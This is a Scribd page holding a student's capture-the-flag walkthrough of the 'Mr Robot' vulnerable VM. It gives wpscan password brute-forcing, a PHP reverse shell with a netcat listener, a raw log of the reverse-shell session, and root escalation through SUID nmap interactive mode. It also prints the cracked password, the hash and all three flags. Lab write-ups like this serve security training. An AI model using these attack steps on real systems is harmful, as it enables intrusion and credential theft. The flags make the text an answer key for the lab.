Scribd Logo
Upload

Welcome to Scribd!

  • 85 views

    Report On VM 2 Ip:-144.244.143.144 Name:sathya Sachi Paira: Nmap - P - A 143.244.143.144

    Uploaded by

    Saumay Srivastava
    The document provides details of a penetration test carried out on a virtual machine with IP address 144.244.143.144. It describes the steps taken which include reconnaissance using Nikto and the robots.txt file, discovering WordPress credentials using a dictionary attack, generating and uploading a backdoor PHP file to get a reverse shell, and obtaining root privileges by cracking an MD5 hash and finding sudo permissions.

    Copyright:

    © All Rights Reserved
    Download as ODT, PDF, TXT or read online from Scribd

    Report On VM 2 Ip:-144.244.143.144 Name:sathya Sachi Paira: Nmap - P - A 143.244.143.144

    Uploaded by

    Saumay Srivastava
    85 views13 pages
    The document provides details of a penetration test carried out on a virtual machine with IP address 144.244.143.144. It describes the steps taken which include reconnaissance using Nikto and the robots.txt file, discovering WordPress credentials using a dictionary attack, generating and uploading a backdoor PHP file to get a reverse shell, and obtaining root privileges by cracking an MD5 hash and finding sudo permissions.

    Original Title

    mr robot

    Copyright

    © © All Rights Reserved

    Available Formats

    ODT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    The document provides details of a penetration test carried out on a virtual machine with IP address 144.244.143.144. It describes the steps taken which include reconnaissance using Nikto and the robots.txt file, discovering WordPress credentials using a dictionary attack, generating and uploading a backdoor PHP file to get a reverse shell, and obtaining root privileges by cracking an MD5 hash and finding sudo permissions.

    Copyright:

    © All Rights Reserved
    Download as ODT, PDF, TXT or read online from Scribd
    Download as odt, pdf, or txt
    85 views13 pages

    Report On VM 2 Ip:-144.244.143.144 Name:sathya Sachi Paira: Nmap - P - A 143.244.143.144

    Uploaded by

    Saumay Srivastava
    The document provides details of a penetration test carried out on a virtual machine with IP address 144.244.143.144. It describes the steps taken which include reconnaissance using Nikto and the robots.txt file, discovering WordPress credentials using a dictionary attack, generating and uploading a backdoor PHP file to get a reverse shell, and obtaining root privileges by cracking an MD5 hash and finding sudo permissions.

    Copyright:

    © All Rights Reserved
    Download as ODT, PDF, TXT or read online from Scribd
    Download as odt, pdf, or txt
    of 13

    Report on vm 2

    Ip:-144.244.143.144
    name:sathya sachi paira
    email:[email protected]

    Penetrating Methodology:

    •Recon (Nikto)
    •Use robot.txt
    •Grab 1st key
    •Download fsocity.dic file and use a dictionary
    •WordPress password cracking (wpscan)
    •Login into WordPress
    •Generate PHP Backdoor (Msfvenom)
    •Upload and execute a backdoor
    •Reverse connection (Metasploit)
    •Get MD5 hash and decrypt it
    •Import python one-liner for proper TTY shell
    •Find / perm u=s for Privilege Escalation
    •Get Root access and capture the flag.

    To scan our target IP we will use aggressive scan (-A)


    nmap -p- -A 143.244.143.144
    The scan’s result shows us the open ports are: 22, 80, and 443. As the 80 port is open we can try and
    open this IP in our browser.

    Using waplazzer
    and we see cms type is running is wordpress

    using robots.txt we get two this :-


    fsociety.txt
    key-1-of-3.txt

    now we have to download the file in pc


    command :- wget http://143.244.143.144/fsociety.dic
    command;- wget http://143.244.143.144/key-1-of-3.txt
    flag1:- 073403c8a58a1f80d94355fb30724b9
    command to get the txt:- nano key-1-of-3.txt

    now we have have to sort the word count


    and command :- sort fsociety.dic | uniq > fsociety_filter.dic

    now we have to type in browser


    command:-143.244.143.144/wp-login.php
    now we have to do wpscan
    command ;-wpscan -u http://143.244.143.144/ --username Elliot --
    wordlist /root/Desktop/fsocity.dic
    and now we find the password of the elliot
    walla i get the password
    passowrd is :- ER28-0652

    wow now we in php

    Once you have logged in, make the malicious file that you got to upload in it. Generate code
    through the msfvenom command:

    now we have to use pentestmonkey reverse shell of php bye github


    and listener command is :- rlwrap nc -lvnp 4455
    now we have to do privilage escalation

    now we have to crack the cipher


    i use crack station:crackstation.net

    now end part


    ┌──(kali㉿kali)-[~/mrrobot]
    └─$ rlwrap nc -lvnp 53
    148 ⨯ 4 ⚙
    listening on [any] 53 ...
    connect to [192.168.1.28] from (UNKNOWN) [143.244.143.144] 57653
    Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10
    UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    08:54:09 up 43 min, 0 users, load average: 0.00, 0.09, 0.17
    USER TTY FROM LOGIN@ IDLE JCPU PCPU
    WHAT
    uid=1(daemon) gid=1(daemon) groups=1(daemon)
    /bin/sh: 0: can't access tty; job control turned off
    ls
    bin
    boot
    dev
    etc
    home
    initrd.img
    lib
    lib64
    lost+found
    media
    mnt
    opt
    proc
    root
    run
    sbin
    srv
    sys
    tmp
    usr
    var
    vmlinuz
    id
    uid=1(daemon) gid=1(daemon) groups=1(daemon)
    ls /root
    ls: cannot open directory /root: Permission denied
    pwd
    /
    ls /home
    robot
    cd robot
    /bin/sh: 6: cd: can't cd to robot
    ls /robot
    ls: cannot access /robot: No such file or directory
    cd /home/robot
    ls
    key-2-of-3.txt
    password.raw-md5
    cat key-2-of-3.txt
    cat: key-2-of-3.txt: Permission denied
    ls -las
    total 16
    4 drwxr-xr-x 2 root root 4096 Nov 13 2015 .
    4 drwxr-xr-x 3 root root 4096 Nov 13 2015 ..
    4 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
    4 -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
    cat password.raw-md5
    robot:c3fcd3d76192e4007dfb496cca67e13b
    su
    su: must be run from a terminal
    python -c ' import pty;pty.spawn("/bin/bash")'
    File "<string>", line 1
    import pty;pty.spawn("/bin/bash")
    ^
    IndentationError: unexpected indent
    python -c 'import pty;pty.spawn("/bin/bash")'
    su robot
    su robot
    abcdefghijklmnopqrstuvwxyz

    ls
    ls
    key-2-of-3.txt password.raw-md5
    cat key-2-of-3.txt
    cat key-2-of-3.txt
    822c73956184f694993bede3eb39f959
    nmap -interactive
    nmap -interactive
    Failed to open input file nteractive for reading
    QUITTING!
    find / -perm +6000 2>/dev/null | grep '/bin/'
    find / -perm +6000 2>/dev/null | grep '/bin/'
    /bin/ping
    /bin/umount
    /bin/mount
    /bin/ping6
    /bin/su
    /usr/bin/mail-touchlock
    /usr/bin/passwd
    /usr/bin/newgrp
    /usr/bin/screen
    /usr/bin/mail-unlock
    /usr/bin/mail-lock
    /usr/bin/chsh
    /usr/bin/crontab
    /usr/bin/chfn
    /usr/bin/chage
    /usr/bin/gpasswd
    /usr/bin/expiry
    /usr/bin/dotlockfile
    /usr/bin/sudo
    /usr/bin/ssh-agent
    /usr/bin/wall
    /usr/local/bin/nmap
    ^[[200~/usr/local/bin/nmap
    0~/usr/local/bin/nmap
    bash: 0~/usr/local/bin/nmap: No such file or directory
    /usr/local/bin/nmapn -interactive

    /usr/local/bin/nmapn -interactive
    bash: /usr/local/bin/nmapn: No such file or directory

    robot@linux:~$
    /usr/local/bin/nmapn --interactive

    /usr/local/bin/nmapn --interactive
    bash: /usr/local/bin/nmapn: No such file or directory

    robot@linux:~$
    /usr/local/bin/nmap --interactive

    /usr/local/bin/nmap --interactive

    Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )


    Welcome to Interactive Mode -- press h <enter> for help
    nmap> Bogus command -- press h <enter> for help
    whoami
    whoami
    Unknown command (whoami) -- press h <enter> for help
    !sh
    !sh
    whoami
    whoami
    root
    ls
    ls
    key-2-of-3.txt password.raw-md5
    pwd
    pwd
    /home/robot
    cd /
    cd /
    ls
    ls
    bin dev home lib lost+found mnt proc run srv
    tmp var
    boot etc initrd.img lib64 media opt root sbin sys
    usr vmlinuz
    find key
    find key
    find: `key': No such file or directory
    find -f key
    find -f key
    find: unknown predicate `-f'
    cd /root
    cd /root
    ls
    ls
    firstboot_done key-3-of-3.txt
    cat firstboot_done
    cat firstboot_done
    cat key-3-of-3.txt
    cat key-3-of-3.txt
    04787ddef27c3dee1ee161b21670b4e4

    You might also like